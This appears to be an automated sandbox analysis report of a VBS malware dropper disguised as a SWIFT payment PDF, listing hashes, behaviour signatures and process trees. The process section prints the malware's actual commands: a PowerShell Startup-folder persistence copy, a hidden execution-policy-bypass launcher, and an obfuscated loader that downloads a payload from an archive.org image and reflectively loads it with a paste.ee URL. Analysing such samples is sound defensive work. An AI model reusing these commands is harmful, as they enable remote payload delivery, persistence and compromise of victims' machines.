Analysis

  • max time kernel: 101s
  • max time network: 30s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 08-10-2024 07:22

General

  • Target: SWIFT 103 202410071519130850 071024.pdf.vbs
  • Size: 193KB
  • MD5: 377669c2284f0c7020ff08d85250bd17
  • SHA1: a32a1e200df0818b9a3b8c156354406c0e3f8909
  • SHA256: 62cd3c0fbbb28a44e83d0b403dea992fa9e0e25243ddeab961282de490f2b928
  • SHA512: c0fddbc341c92079427d8d55a0b3b9a2ac4c8a3b4790cf04dfad47d3715f510dd975b14cccd365077ed6e21628bd0911d98fa52ab2b58547e6c3f4f9012313f0
  • SSDEEP: 3072:QSwp19rv+/CtALCVUwxgt5p7GwXvpiE6TLXnUXmaHNTjE:Qz79rmKeeuwFXnhQNT4

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • ps1.dropper: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
    • exe.dropper: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request (2 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)

    Using powershell.exe command.

  • Drops startup file (2 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (15 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = {0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg {'+'0};{1}webClient = New-Object '+'System.Net.WebClient;{1}imageBytes = {1}webCli'+'ent.DownloadData({1}ima'+'geUrl);{1}imageText = [Syste'+'m.Text.Encoding]::U'+'TF8.GetString({1}imageBy'+'tes);{1'+'}startFlag = {0}<<BASE64_START>>{0};{1}endFlag ='+' {0}<<BASE64'+'_END>>{0};{1}startIndex = {1}ima'+'geText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1'+'}startIndex;{1}startIndex'+' += {1}startFlag.Length;{1}base64Length = {1}e'+'ndIndex -'+' {1}startIndex;{1}base64'+'Com'+'mand = {1}i'+'mage'+'Text.Substring'+'({1}startIndex, {1}base64Length);{1}commandBytes = [System.Conve'+'rt]::FromBase64String({1}base64Command);{1}lo'+'adedAssembly = [System.Reflection.Assembly]::Load({'+'1}commandBytes);{1}vaiMethod'+' = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}0'+'/ZutgP'+'/d/'+'ee.etsap//:sptth{0}'+', {0}desativado{0}, {0}desat'+'ivado{0}, {0}desativado{0}, {0}AddInProcess32{0}, {0}desativado{0},'+' {0}desativado{0}));') -F [ChAr]39,[ChAr]36)|. ( $PShomE[4]+$pSHOMe[30]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1968

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    • Filesize: 7KB
    • MD5: 8b8873874af967e4aa26daff7a2c777c
    • SHA1: 5d4828fd84fb63be6873744b0b7b271a63f2fe40
    • SHA256: 40c0d4c551bbd84653c125df3d5403dad0d975a35a34c1de1c227e6c55bf0dd1
    • SHA512: af1563669b8ed983eb5a84fdd1b0ecd9dfb283af2da108a5fb0df8af36c15c23407321d66e7eef213b19b3658ed17c37a50f70d879ecbbfaa436e4d0f686863a

  • memory/2808-20-0x0000000001E70000-0x0000000001E78000-memory.dmp
    • Filesize: 32KB

  • memory/2808-19-0x000000001B200000-0x000000001B4E2000-memory.dmp
    • Filesize: 2.9MB

  • memory/3068-7-0x00000000022A0000-0x00000000022A8000-memory.dmp
    • Filesize: 32KB

  • memory/3068-10-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-12-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-11-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-13-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-9-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-5-0x000007FEF630E000-0x000007FEF630F000-memory.dmp
    • Filesize: 4KB

  • memory/3068-8-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp
    • Filesize: 9.6MB

  • memory/3068-6-0x000000001B210000-0x000000001B4F2000-memory.dmp
    • Filesize: 2.9MB